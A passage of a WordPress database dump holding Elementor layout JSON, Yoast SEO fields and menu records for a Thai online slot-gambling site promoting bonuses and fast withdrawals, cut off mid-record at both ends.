\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1a\\u0e31\\u0e19\\u0e40\\u0e17\\u0e34\\u0e07\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e21\\u0e35\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e34\\u0e14\\u0e0a\\u0e2d\\u0e1a\\u0e15\\u0e48\\u0e2d\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07\\u0e43\\u0e19\\u0e23\\u0e30\\u0e22\\u0e30\\u0e22\\u0e32\\u0e27<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"953f46b\",\"elType\":\"section\",\"settings\":{\"structure\":\"32\"},\"elements\":[{\"id\":\"cca046d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"6986c03\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/PG-1.webp\",\"id\":360,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"9ee3b73\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"_inline_size_mobile\":50},\"elements\":[{\"id\":\"313c578\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Microgaming-1.webp\",\"id\":359,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"053c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"_inline_size_mobile\":50},\"elements\":[{\"id\":\"60b9d1b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/JILI-1.webp\",\"id\":356,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d93020a\",\"elType\":\"section\",\"settings\":{\"structure\":\"31\"},\"elements\":[{\"id\":\"68262e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_mobile\":50},\"elements\":[{\"id\":\"05f18b4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/JOKER.webp\",\"id\":292,\"size\":\"\",\"alt\":\"JOKER\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"268ff30\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_mobile\":50},\"elements\":[{\"id\":\"a316455\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Slot-xo-1.webp\",\"id\":364,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"db9361a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"5a3a81d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/pragmatic-1.webp\",\"id\":361,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"background_hover_transition\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]},\"hover_animation\":\"pulse-shrink\",\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":5,\"blur\":25,\"spread\":5,\"color\":\"rgba(225.84765625, 21.115681855574877, 21.115681855574877, 0.44)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(108,26,'_elementor_edit_mode','builder'),(109,26,'_elementor_template_type','wp-page'),(110,26,'_elementor_version','3.32.5'),(111,26,'_elementor_pro_version','3.32.3'),(112,26,'_wp_page_template','default'),(113,26,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(114,26,'_elementor_data','[]'),(117,27,'_edit_lock','1772133979:3'),(118,27,'_edit_last','3'),(119,27,'_yoast_wpseo_title','โปรโมชั่น AMB18 รวมโปรสล็อต สมัครรับโบนัสฟรี 100% ถอนไม่อั้น'),(120,27,'_yoast_wpseo_metadesc','โปรโมชั่น AMB18 แจกโบนัสล่าสุด 2025 ทั้งโปรฝากแรก โปรวันเกิด โปรชวนเพื่อน โบนัสเพียบ ถอนได้จริงทุกโปร ไม่มีขั้นต่ำ'),(121,27,'_yoast_wpseo_content_score','90'),(122,27,'_yoast_wpseo_estimated-reading-time-minutes','3'),(123,29,'_edit_lock','1772133743:3'),(124,29,'_edit_last','3'),(125,29,'_yoast_wpseo_focuskw','ฝากถอนออโต้'),(126,29,'_yoast_wpseo_title','AMB18 ฝากถอนออโต้ทันสมัย ระบบเร็วสุดในไทย ไม่มีขั้นต่ำ 5 วิเงินเข้า'),(127,29,'_yoast_wpseo_metadesc','AMB18 ระบบฝากถอนออโต้ เร็วทันใจภายใน 5 วินาที ไม่มีขั้นต่ำ รองรับทั้งธนาคารและ True Wallet ปลอดภัย มั่นคง ถอนหลักแสนได้จริง'),(128,29,'_yoast_wpseo_linkdex','49'),(129,29,'_yoast_wpseo_content_score','90'),(130,29,'_yoast_wpseo_estimated-reading-time-minutes','1'),(132,32,'_elementor_source','post'),(133,32,'_elementor_edit_mode','builder'),(134,32,'_elementor_template_type','header'),(135,32,'_elementor_version','4.1.5'),(136,32,'_elementor_pro_version','3.32.3'),(137,32,'_edit_lock','1784287150:3'),(165,36,'_elementor_source','post'),(166,36,'_elementor_edit_mode','builder'),(167,36,'_elementor_template_type','header'),(168,36,'_elementor_version','3.32.5'),(169,36,'_elementor_pro_version','3.32.3'),(170,32,'_wp_page_template','default'),(171,32,'_elementor_data','[{\"id\":\"2a37657\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"50\",\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#99CC00\",\"background_color_b\":\"#FFEF2A\",\"box_shadow_box_shadow_type\":\"yes\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"#FBFBFB\"}},\"elements\":[{\"id\":\"f229e82\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":14.7859999999999995878852132591418921947479248046875,\"_inline_size_mobile\":80},\"elements\":[{\"id\":\"265c642\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false},{\"id\":\"43121f4\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":48.546999999999997044142219237983226776123046875,\"_inline_size_tablet\":20,\"_inline_size_mobile\":20},\"elements\":[{\"id\":\"ece9e44\",\"elType\":\"widget\",\"settings\":{\"menu_name\":\"Menu\",\"menu\":\"main-menu\",\"full_width\":\"stretch\",\"color_dropdown_item\":\"#FFFFFF\",\"background_color_dropdown_item\":\"#000000\",\"background_color_dropdown_item_hover\":\"#FFFFFFBA\",\"toggle_color\":\"#FFFFFF\",\"toggle_size_mobile\":{\"unit\":\"px\",\"size\":27,\"sizes\":[]},\"align_items\":\"center\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false},{\"id\":\"4603d33\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":13.419000000000000483169060316868126392364501953125,\"_inline_size_tablet\":21,\"_inline_size_mobile\":50},\"elements\":[{\"id\":\"469ae70\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\",\"link\":{\"url\":\"https:\\/\\/member.luca333.net\\/go\\/luca333\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"hover_animation\":\"shrink\",\"button_text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"f2a695b\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":11.8800000000000007815970093361102044582366943359375,\"_inline_size_tablet\":21,\"_inline_size_mobile\":50},\"elements\":[{\"id\":\"bb7db24\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\",\"link\":{\"url\":\"https:\\/\\/member.luca333.net\\/go\\/luca333\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"button_text_color\":\"#A30808\",\"background_color\":\"#FFFFFF\",\"button_background_hover_color\":\"#FFFFFF\",\"hover_animation\":\"shrink\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"f85ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":11.3510000000000008668621376273222267627716064453125,\"_inline_size_tablet\":18},\"elements\":[{\"id\":\"5958e0a\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e15\\u0e34\\u0e14\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e23\\u0e32\",\"link\":{\"url\":\"http:\\/\\/luca333-line.com\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"button_text_color\":\"#FFFFFF\",\"background_color\":\"#056704\",\"hover_animation\":\"shrink\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false}]'),(172,37,'_elementor_source','post'),(173,37,'_elementor_edit_mode','builder'),(174,37,'_elementor_template_type','header'),(175,37,'_elementor_version','3.32.5'),(176,37,'_elementor_pro_version','3.32.3'),(177,37,'_wp_page_template','default'),(178,37,'_elementor_data','[{\"id\":\"2a37657\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"50\"},\"elements\":[{\"id\":\"f229e82\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"265c642\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false},{\"id\":\"43121f4\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"ece9e44\",\"elType\":\"widget\",\"settings\":{\"menu_name\":\"Menu\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false},{\"id\":\"4603d33\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"469ae70\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\",\"link\":{\"url\":\"https:\\/\\/megabetauto.com\\/auth\\/register\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"hover_animation\":\"shrink\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"f2a695b\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"bb7db24\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\",\"link\":{\"url\":\"https:\\/\\/megabetauto.com\\/\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"button_text_color\":\"#A30808\",\"background_color\":\"#FFFFFF\",\"button_background_hover_color\":\"#FFFFFF\",\"hover_animation\":\"shrink\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"f85ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"5958e0a\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e15\\u0e34\\u0e14\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e23\\u0e32\",\"link\":{\"url\":\"mgbline.com\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"button_text_color\":\"#FFFFFF\",\"background_color\":\"#056704\",\"hover_animation\":\"shrink\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false}]'),(181,38,'_menu_item_type','taxonomy'),(182,38,'_menu_item_menu_item_parent','0'),(183,38,'_menu_item_object_id','6'),(184,38,'_menu_item_object','category'),(185,38,'_menu_item_target',''),(186,38,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(187,38,'_menu_item_xfn',''),(188,38,'_menu_item_url',''),(190,39,'_menu_item_type','post_type'),(191,39,'_menu_item_menu_item_parent','0'),(192,39,'_menu_item_object_id','29'),(193,39,'_menu_item_object','page'),(194,39,'_menu_item_target',''),(195,39,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(196,39,'_menu_item_xfn',''),(197,39,'_menu_item_url',''),(199,40,'_menu_item_type','post_type'),(200,40,'_menu_item_menu_item_parent','0'),(201,40,'_menu_item_object_id','27'),(202,40,'_menu_item_object','page'),(203,40,'_menu_item_target',''),(204,40,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(205,40,'_menu_item_xfn',''),(206,40,'_menu_item_url',''),(208,41,'_menu_item_type','post_type'),(209,41,'_menu_item_menu_item_parent','0'),(210,41,'_menu_item_object_id','16'),(211,41,'_menu_item_object','page'),(212,41,'_menu_item_target',''),(213,41,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(214,41,'_menu_item_xfn',''),(215,41,'_menu_item_url',''),(218,42,'_elementor_source','post'),(219,42,'_elementor_edit_mode','builder'),(220,42,'_elementor_template_type','header'),(221,42,'_elementor_version','3.32.5'),(222,42,'_elementor_pro_version','3.32.3'),(223,42,'_wp_page_template','default'),(224,42,'_elementor_data','[{\"id\":\"2a37657\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"50\",\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#530707\",\"background_color_b\":\"#140106\"},\"elements\":[{\"id\":\"f229e82\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null,\"_inline_size_mobile\":80},\"elements\":[{\"id\":\"265c642\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false},{\"id\":\"43121f4\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":37.43599999999999994315658113919198513031005859375,\"_inline_size_tablet\":20,\"_inline_size_mobile\":20},\"elements\":[{\"id\":\"ece9e44\",\"elType\":\"widget\",\"settings\":{\"menu_name\":\"Menu\",\"menu\":\"main-menu\",\"full_width\":\"stretch\",\"color_dropdown_item\":\"#FFFFFF\",\"background_color_dropdown_item\":\"#000000\",\"background_color_dropdown_item_hover\":\"#FFFFFFBA\",\"toggle_color\":\"#FFFFFF\",\"toggle_size_mobile\":{\"unit\":\"px\",\"size\":27,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false},{\"id\":\"4603d33\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":14.272999999999999687361196265555918216705322265625,\"_inline_size_tablet\":21,\"_inline_size_mobile\":50},\"elements\":[{\"id\":\"469ae70\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\",\"link\":{\"url\":\"https:\\/\\/megabetauto.com\\/auth\\/register\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"hover_animation\":\"shrink\",\"button_text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"f2a695b\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":15.2140000000000004121147867408581078052520751953125,\"_inline_size_tablet\":21,\"_inline_size_mobile\":50},\"elements\":[{\"id\":\"bb7db24\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\",\"link\":{\"url\":\"https:\\/\\/megabetauto.com\\/\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"button_text_color\":\"#A30808\",\"background_color\":\"#FFFFFF\",\"button_background_hover_color\":\"#FFFFFF\",\"hover_animation\":\"shrink\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"f85ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":13.0600000000000004973799150320701301097869873046875,\"_inline_size_tablet\":18},\"elements\":[{\"id\":\"5958e0a\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e15\\u0e34\\u0e14\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e23\\u0e32\",\"link\":{\"url\":\"mgbline.com\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"button_text_color\":\"#FFFFFF\",\"background_color\":\"#056704\",\"hover_animation\":\"shrink\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false}]'),(227,32,'_elementor_conditions','a:1:{i:0;s:15:\"include/general\";}'),(228,43,'_elementor_source','post'),(229,43,'_elementor_edit_mode','builder'),(230,43,'_elementor_template_type','header'),(231,43,'_elementor_version','3.32.5'),(232,43,'_elementor_pro_version','3.32.3'),(233,43,'_wp_page_template','default'),(234,43,'_elementor_data','[{\"id\":\"2a37657\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"50\",\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#530707\",\"background_color_b\":\"#140106\",\"box_shadow_box_shadow_type\":\"yes\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"#FBFBFB\"}},\"elements\":[{\"id\":\"f229e82\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null,\"_inline_size_mobile\":80},\"elements\":[{\"id\":\"265c642\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false},{\"id\":\"43121f4\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":37.43599999999999994315658113919198513031005859375,\"_inline_size_tablet\":20,\"_inline_size_mobile\":20},\"elements\":[{\"id\":\"ece9e44\",\"elType\":\"widget\",\"settings\":{\"menu_name\":\"Menu\",\"menu\":\"main-menu\",\"full_width\":\"stretch\",\"color_dropdown_item\":\"#FFFFFF\",\"background_color_dropdown_item\":\"#000000\",\"background_color_dropdown_item_hover\":\"#FFFFFFBA\",\"toggle_color\":\"#FFFFFF\",\"toggle_size_mobile\":{\"unit\":\"px\",\"size\":27,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false},{\"id\":\"4603d33\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":14.272999999999999687361196265555918216705322265625,\"_inline_size_tablet\":21,\"_inline_size_mobile\":50},\"elements\":[{\"id\":\"469ae70\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\",\"link\":{\"url\":\"https:\\/\\/megabetauto.com\\/auth\\/register\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"hover_animation\":\"shrink\",\"button_text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"f2a695b\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":15.2140000000000004121147867408581078052520751953125,\"_inline_size_tablet\":21,\"_inline_size_mobile\":50},\"elements\":[{\"id\":\"bb7db24\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\",\"link\":{\"url\":\"https:\\/\\/megabetauto.com\\/\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"button_text_color\":\"#A30808\",\"background_color\":\"#FFFFFF\",\"button_background_hover_color\":\"#FFFFFF\",\"hover_animation\":\"shrink\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"f85ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":13.0600000000000004973799150320701301097869873046875,\"_inline_size_tablet\":18},\"elements\":[{\"id\":\"5958e0a\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e15\\u0e34\\u0e14\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e23\\u0e32\",\"link\":{\"url\":\"mgbline.com\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"button_text_color\":\"#FFFFFF\",\"background_color\":\"#056704\",\"hover_animation\":\"shrink\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false}]'),(236,43,'_elementor_conditions','a:1:{i:0;s:15:\"include/general\";}'),(238,44,'_edit_lock','1784285693:3'),(239,44,'_edit_last','3'),(240,44,'_yoast_wpseo_content_score','90'),(241,44,'_yoast_wpseo_estimated-reading-time-minutes','1'),(248,46,'_menu_item_type','post_type'),(249,46,'_menu_item_menu_item_parent','0'),(250,46,'_menu_item_object_id','44'),(251,46,'_menu_item_object','page'),(252,46,'_menu_item_target',''),(253,46,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(254,46,'_menu_item_xfn',''),(255,46,'_menu_item_url',''),(257,47,'_elementor_source','post'),(258,47,'_elementor_edit_mode','builder'),(259,47,'_elementor_template_type','header'),(260,47,'_elementor_version','3.32.5'),(261,47,'_elementor_pro_version','3.32.3'),(262,47,'_wp_page_template','default'),(263,47,'_elementor_data','[{\"id\":\"2a37657\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"50\",\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#530707\",\"background_color_b\":\"#140106\",\"box_shadow_box_shadow_type\":\"yes\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"#FBFBFB\"}},\"elements\":[{\"id\":\"f229e82\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":14.7859999999999995878852132591418921947479248046875,\"_inline_size_mobile\":80},\"elements\":[{\"id\":\"265c642\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false},{\"id\":\"43121f4\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":48.546999999999997044142219237983226776123046875,\"_inline_size_tablet\":20,\"_inline_size_mobile\":20},\"elements\":[{\"id\":\"ece9e44\",\"elType\":\"widget\",\"settings\":{\"menu_name\":\"Menu\",\"menu\":\"main-menu\",\"full_width\":\"stretch\",\"color_dropdown_item\":\"#FFFFFF\",\"background_color_dropdown_item\":\"#000000\",\"background_color_dropdown_item_hover\":\"#FFFFFFBA\",\"toggle_color\":\"#FFFFFF\",\"toggle_size_mobile\":{\"unit\":\"px\",\"size\":27,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false},{\"id\":\"4603d33\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":13.419000000000000483169060316868126392364501953125,\"_inline_size_tablet\":21,\"_inline_size_mobile\":50},\"elements\":[{\"id\":\"469ae70\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\",\"link\":{\"url\":\"https:\\/\\/megabetauto.com\\/auth\\/register\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"hover_animation\":\"shrink\",\"button_text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"f2a695b\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":11.8800000000000007815970093361102044582366943359375,\"_inline_size_tablet\":21,\"_inline_size_mobile\":50},\"elements\":[{\"id\":\"bb7db24\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\",\"link\":{\"url\":\"https:\\/\\/megabetauto.com\\/\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"button_text_color\":\"#A30808\",\"background_color\":\"#FFFFFF\",\"button_background_hover_color\":\"#FFFFFF\",\"hover_animation\":\"shrink\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"f85ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":11.3510000000000008668